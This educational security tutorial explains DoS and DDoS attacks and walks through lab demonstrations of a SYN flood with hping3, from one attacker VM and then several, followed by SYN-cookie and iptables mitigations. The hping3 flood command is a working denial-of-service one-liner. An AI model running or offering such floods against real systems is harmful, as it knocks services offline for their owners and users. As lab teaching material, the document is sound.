1. DoS (Denial of Service)

A DoS attack is carried out by a single source to exhaust system resources (CPU, memory, bandwidth) and disrupt normal operations.

Types of DoS Attacks:

• Volumetric Attacks – Flooding the target with excessive traffic (e.g., UDP flood, ICMP flood).
• Protocol Attacks – Exploiting weaknesses in network protocols (e.g., SYN flood, Ping of Death).
• Application Layer Attacks – Targeting web applications (e.g., HTTP Flood, Slowloris attack).

Example:

A hacker continuously sends ping requests (ICMP flood) to a web server, consuming its resources and causing it to crash.

---

2. DDoS (Distributed Denial of Service)

A DDoS attack is a large-scale attack performed using multiple compromised devices (botnet), making it harder to mitigate.

How it Works:

• The attacker infects multiple computers or IoT devices with malware.
• These devices (botnets) receive instructions to flood the target.
• The massive traffic volume overwhelms the system, causing downtime.

Types of DDoS Attacks:

• Volumetric Attacks – Large-scale traffic floods from multiple sources (e.g., DNS Amplification, NTP Amplification).
• Protocol Attacks – Exploiting vulnerabilities at the transport and network layers (e.g., SYN flood).
• Application Layer Attacks – Targeting application resources (e.g., HTTP GET/POST Flood).

Example:

A hacker uses a botnet of thousands of infected devices to flood an e-commerce website with HTTP requests, making it inaccessible.

---

Key Differences:

Feature	DoS	DDoS
Attack Source	Single machine	Multiple machines (botnet)
Scale of Attack	Small to medium	Large-scale, more powerful
Complexity	Simple to detect & block	Harder to mitigate due to multiple sources
Mitigation	Firewall, rate limiting	DDoS protection services (Cloudflare, AWS Shield)

---

How to Prevent DoS & DDoS Attacks

✔️ Use a Web Application Firewall (WAF)
✔️ Implement rate limiting and traffic filtering
✔️ Use DDoS protection services (Cloudflare, Akamai, AWS Shield)
✔️ Monitor network traffic for anomalous activity
✔️ Deploy CDNs (Content Delivery Networks) to distribute traffic

---

🧪 DoS Attack Demonstration using hping3 (Educational Tutorial)

⚠️ Disclaimer: This tutorial is for educational purposes only. Never perform DoS attacks on public or unauthorized systems. Only test in isolated environments you control (e.g., VMs, Docker, local LAN).

---

🛠️ What You’ll Learn

• How to simulate a basic SYN Flood Attack using hping3

• How the target machine reacts

• How to monitor and optionally defend against it

---

🧰 Requirements

Role	System	Tools Needed
Attacker	VM or Host	hping3
Target	VM or Host	Python / Netcat listener

---

🔧 Step 1: Set Up the Target Machine

🔹 Option A: Run a simple HTTP server

sudo python3 -m http.server 80

🔹 Option B: Use Netcat to open port 80

sudo nc -lvp 80

Keep this terminal open. It simulates a real server listening for connections.

---

💣 Step 2: Launch a SYN Flood from the Attacker Machine

✅ Install hping3

Ubuntu/Debian:

sudo apt update
sudo apt install hping3 -y

Fedora/RHEL:

sudo dnf install hping3 -y

---

🔥 Run the Attack (SYN Flood)

sudo hping3 -S --flood -V -p 80 TARGET_IP

Replace TARGET_IP with the IP address of your target machine.

✅ What each flag means:

• -S: Sends SYN packets (like initiating a TCP handshake)

• --flood: Sends packets rapidly, as fast as possible

• -V: Enables verbose output

• -p 80: Sends packets to port 80

---

📊 Step 3: Observe Target Behavior

On the Target machine:

sudo netstat -ant | grep :80

Or:

ss -s

You’ll likely see a lot of SYN_RECV entries — these are half-open connections, indicating a SYN flood.

---

📉 What Happens?

• The target’s CPU/network may spike

• Services on port 80 may slow down or become unresponsive

• You’re seeing a resource exhaustion attack in action

---

🛡️ Step 4: Mitigation (Optional)

🔸 Enable SYN Cookies

sudo sysctl -w net.ipv4.tcp_syncookies=1

🔸 Apply Iptables Rate Limiting

sudo iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j ACCEPT
sudo iptables -A INPUT -p tcp --syn -j DROP

🔸 Monitor with iftop or tcpdump

sudo apt install iftop
sudo iftop -i eth0

---

🧪 Bonus: Use Docker for a Self-Contained Lab

Let me know if you want a Docker-based version of this demo (attacker and victim as separate containers). Super handy for safe, repeatable labs.

---

✅ Summary

Step	Action
1. Setup	Simple server on target (python3 -m http.server)
2. Install	Install hping3 on attacker machine
3. Launch	Run hping3 -S --flood -p 80 TARGET_IP
4. Observe	Use netstat, ss, or htop on target
5. Optional	Apply mitigation like SYN cookies / iptables

🧪 DDoS Attack Simulation using hping3 (Educational Tutorial)

⚠️ Legal Notice: DDoS attacks are illegal on public infrastructure. This guide is strictly educational and must be run in a private network that you own — like a local lab, virtual machines, or Docker setup.

---

🎯 What You’ll Do

• Set up 1 victim server and 2+ attacker systems (VMs, Docker, or even WSL)

• Use hping3 on each attacker to simulate a coordinated SYN Flood

• Observe the impact on the victim machine

• Learn about DDoS mitigation

---

🧰 Requirements

Machine	Role	Requirements
VM1	Victim	Python or Netcat
VM2, VM3...	Attackers	hping3 installed

Use VirtualBox, VMware, or Docker with separate IPs in a NAT/host-only network.

---

🔧 Step 1: Set Up the Victim Server

On the victim machine (VM1):

Option A: Python HTTP Server

sudo python3 -m http.server 80

Option B: Netcat Listener

sudo nc -lvp 80

---

🚀 Step 2: Prepare the Attackers

On each attacker machine (VM2, VM3, etc.), install hping3:

sudo apt update
sudo apt install hping3 -y

---

💥 Step 3: Launch the DDoS (Simulated)

On each attacker, run the following command (change TARGET_IP to the IP of the victim):

sudo hping3 -S --flood -V -p 80 TARGET_IP

Run this simultaneously from multiple attacker VMs to simulate a DDoS.

---

📊 Step 4: Observe the Attack

On the victim machine:

Run:

sudo netstat -ant | grep :80

Or:

sudo ss -s

You’ll see a surge in SYN_RECV connections — this means multiple systems are overwhelming the target with TCP requests, simulating a Distributed SYN Flood.

---

📈 Optional: Monitor with iftop or tcpdump

sudo apt install iftop
sudo iftop -i eth0

Or:

sudo tcpdump -i eth0 port 80

You’ll see traffic flooding in from multiple attacker IPs.

---

🛡️ Step 5: Mitigation Techniques

🔐 1. Enable SYN Cookies

sudo sysctl -w net.ipv4.tcp_syncookies=1

🔐 2. Rate Limit with Iptables

sudo iptables -A INPUT -p tcp --syn -m limit --limit 2/s --limit-burst 5 -j ACCEPT
sudo iptables -A INPUT -p tcp --syn -j DROP

🔐 3. Use Fail2Ban or TCPShield for dynamic banning (advanced)

---

✅ Summary

Step	Description
Step 1	Start web server on victim
Step 2	Install hping3 on attackers
Step 3	Run SYN flood from multiple attacker machines
Step 4	Monitor victim with netstat, iftop, etc.
Step 5	Try mitigations like iptables or SYN cookies

---